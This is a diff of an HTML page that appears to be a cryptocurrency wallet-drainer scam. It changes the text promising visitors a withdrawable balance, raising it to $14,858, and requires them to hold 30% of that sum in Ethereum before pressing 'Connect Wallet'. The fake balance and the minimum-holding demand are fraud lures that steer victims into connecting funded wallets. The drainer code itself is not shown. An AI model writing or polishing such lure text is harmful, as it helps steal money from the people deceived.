--- a/index.html
+++ b/index.html
@@ -107,7 +107,7 @@
                     </span>
                 </div>
                 <div class="Home_content__WcTpR">
-                    <div class="Home_desc__q_6Ri">Connect your wallet to withdraw your balance of 9544 USD. Ensure there's a minimum Ethereum balance of 1000 USD in your wallet before withdrawing balance.<br><br>
+                    <div class="Home_desc__q_6Ri">Connect your wallet to withdraw your balance of $14,858. Ensure there's a minimum Ethereum balance of 30% of amount to be withdrawn ($4,457) present in your wallet before initiating withdrawal of balance.<br><br>
                     <div class="Home_soon__8s2ww">
                         <button class="interact-button">Connect Wallet</button><button class="interact-button" style="display: none;">Connect Wallet</button>
                         <br />
